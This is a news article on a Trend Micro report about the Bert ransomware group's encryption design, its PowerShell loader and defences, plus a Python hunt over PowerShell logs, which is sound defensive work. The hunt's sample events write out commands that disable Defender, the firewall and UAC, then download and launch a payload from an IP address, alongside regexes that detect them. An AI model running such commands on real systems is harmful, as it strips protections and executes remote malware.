Trend Micro Reports Bert Ransomware Group Attacking Healthcare Providers

by James Keogh

A new ransomware group is attacking several industries, particularly technology, healthcare, and event services. According to the latest Trend Micro report, the Bert ransomware group, which Trend Micro tracks as Water Pombero, first attacked organizations in the United States and Asia, though victims in Europe have also been identified. The group is believed to originate from, or at least be linked to, Russia: it downloads and deploys its ransomware from a remote IP address registered in Russia and belonging to ASN 39134.

The Windows variant of Bert has a simple code structure and uses AES for file encryption. The group is actively developing the ransomware and streamlining its operations. The first iterations enumerated drives, dropped a ransom note in every directory, collected valid file paths into an array, and only started multi-threaded encryption once that collection stage was complete. The latest iteration instead uses a ConcurrentQueue and spawns a DiskWorker for every drive, so encryption begins as soon as files are discovered rather than after enumeration finishes, which shortens the time needed to encrypt a host.

How initial access to a victim's network is obtained is not yet known. Once inside, the attacker runs a PowerShell script that elevates privileges and disables the Windows Firewall, Windows Defender, and User Account Control (UAC). The same script downloads the ransomware payload from a remote IP address and executes it. Ransomware groups make heavy use of PowerShell for post-compromise activity because it is a trusted, built-in administration tool, so its use blends in with legitimate activity and is easy to overlook. Trend Micro also found a Linux sample that uses 50 threads to speed up encryption, reducing the window in which it can be detected or interrupted. That sample shares several code overlaps with the ESXi locker used by the REvil ransomware group until it ceased operations in 2021.

More new ransomware groups will likely emerge that repurpose well-known tools and code while refining their TTPs. As the Bert ransomware group shows, basic tooling is enough for a successful attack. An emerging group does not need sophisticated techniques, only a reliable way into the target, followed by exfiltration, encryption, and a ransom demand.

Because the initial access vector has not been determined, the best defense is to apply proven security practices: train users on email and web safety, sandbox files before execution, patch promptly, strengthen endpoint protection, limit administrative privileges, segment networks, and back up files regularly, keeping copies offline. Trend Micro also advises closely monitoring PowerShell use and suspicious script execution, specifically loaders such as start.ps1 that disable security software and elevate privileges. The full TTPs and further recommendations are in Trend Micro's Bert ransomware report. For HIPAA covered entities, maintaining HIPAA compliance is also an essential safeguard.
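As an added example (not code from this article or from Trend Micro), here is a small Python hunt over PowerShell script block log entries (Event ID 4104) for the loader behaviour described above: Defender, the firewall and UAC being disabled, a payload fetched from a bare IP address, and that payload being launched. The log entries are constructed, the indicator patterns are written from the behaviours the report describes rather than copied from the real sample, and the start.ps1 name check and scoring threshold are assumptions for illustration. One practitioner detail it handles: Windows splits large scripts across several 4104 events, so fragments are reassembled by ScriptBlockId before matching, otherwise a script that disables Defender in one fragment and downloads the payload in another never crosses the threshold.

```python
"""Hunt PowerShell script block logs (Event ID 4104) for the loader
behaviour described in the Bert report. Example code, not the real sample."""
import re
from collections import defaultdict

# Indicator patterns per tactic. These are assumed shapes written from the
# behaviours the report describes, not signatures taken from start.ps1.
INDICATORS = {
    "defender_disabled": re.compile(
        r"Set-MpPreference\b[^\n]*-Disable(?:RealtimeMonitoring|IOAVProtection|BehaviorMonitoring)",
        re.IGNORECASE),
    "firewall_disabled": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off"
        r"|Set-NetFirewallProfile\b[^\n]*-Enabled\s+(?:False|0|\$false)",
        re.IGNORECASE),
    "uac_disabled": re.compile(r"EnableLUA[^\n]*\b0\b", re.IGNORECASE),
    "payload_from_ip": re.compile(
        r"\b(?:Invoke-WebRequest|iwr|DownloadFile|DownloadString|Start-BitsTransfer|curl)\b"
        r"[^\n]*https?://\d{1,3}(?:\.\d{1,3}){3}",
        re.IGNORECASE),
    "payload_executed": re.compile(
        r"Start-Process\b|Invoke-Expression\b|\biex\b|&\s*\S*\.exe\b", re.IGNORECASE),
    "privilege_elevation": re.compile(r"-Verb\s+RunAs\b", re.IGNORECASE),
}

# Loader file names that are suspicious on their own (the report names start.ps1).
KNOWN_LOADER_NAMES = {"start.ps1"}

# Constructed 4104-style events, not real telemetry. Script "a1" is split
# into two fragments the way Windows splits long script blocks.
SAMPLE_EVENTS = [
    {"ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "Path": "C:\\Users\\Public\\start.ps1",
     "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true\n"
                        "netsh advfirewall set allprofiles state off\n"},
    {"ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "Path": "C:\\Users\\Public\\start.ps1",
     "ScriptBlockText": "Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"
                        "\\Policies\\System -Name EnableLUA -Value 0\n"
                        "Invoke-WebRequest -Uri http://203.0.113.10/payload.exe "
                        "-OutFile C:\\Users\\Public\\p.exe\n"
                        "Start-Process C:\\Users\\Public\\p.exe\n"},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\Scripts\\update-inventory.ps1",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://inventory.example.com/agent.json "
                        "-OutFile C:\\Temp\\a.json\n"},
    {"ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "Path": "C:\\Scripts\\maintenance.ps1",
     "ScriptBlockText": "Set-MpPreference -ScanScheduleDay Saturday\nStart-Process notepad.exe\n"},
]


def reassemble(events):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order.
    Returns {ScriptBlockId: (Path, full_script_text)}."""
    parts = defaultdict(list)
    paths = {}
    for ev in events:
        parts[ev["ScriptBlockId"]].append((ev["MessageNumber"], ev["ScriptBlockText"]))
        paths.setdefault(ev["ScriptBlockId"], ev.get("Path", ""))
    return {sbid: (paths[sbid], "".join(text for _, text in sorted(frags)))
            for sbid, frags in parts.items()}


def classify(script_text):
    """Return the sorted list of indicator names that fire on a script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script_text))


def analyze_events(events, min_score=3):
    """Score each reassembled script: one point per tactic matched, plus one
    if the file name is a known loader name. Scripts at or above min_score
    are returned as findings; a single download or Start-Process on its own
    stays below the bar, which keeps routine admin scripts out of the queue."""
    findings = []
    for sbid, (path, text) in reassemble(events).items():
        hits = classify(text)
        file_name = path.lower().rsplit("\\", 1)[-1]
        score = len(hits) + (1 if file_name in KNOWN_LOADER_NAMES else 0)
        if score >= min_score:
            # Defender off plus a payload pulled from a bare IP is the core
            # of the loader chain described in the report, so rank it highest.
            severity = ("high" if {"defender_disabled", "payload_from_ip"} <= set(hits)
                        else "medium")
            findings.append({"ScriptBlockId": sbid, "Path": path, "indicators": hits,
                             "score": score, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding)
```

Script block logging must be enabled (Turn on PowerShell Script Block Logging under the PowerShell administrative template) for 4104 events to exist at all; without it this hunt has nothing to read. Corroborate hits against the Defender operational log, where real-time protection being switched off is recorded independently of what the script said, and treat a bare IP in a download URL as a strong signal in its own right, since legitimate deployment tooling almost always uses a hostname.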

James Keogh

James Keogh has been writing about the healthcare sector in the United States for several years and is currently the editor of HIPAAnswers. He has a particular interest in HIPAA and the intersection of healthcare privacy and information technology. He has developed specialized knowledge in HIPAA-related issues, including compliance, patient privacy, and data breaches. You can follow James on Twitter https://x.com/JamesKeoghHIPAA and contact James on LinkedIn https://www.linkedin.com/in/james-keogh-89023681 or email directly at [email protected]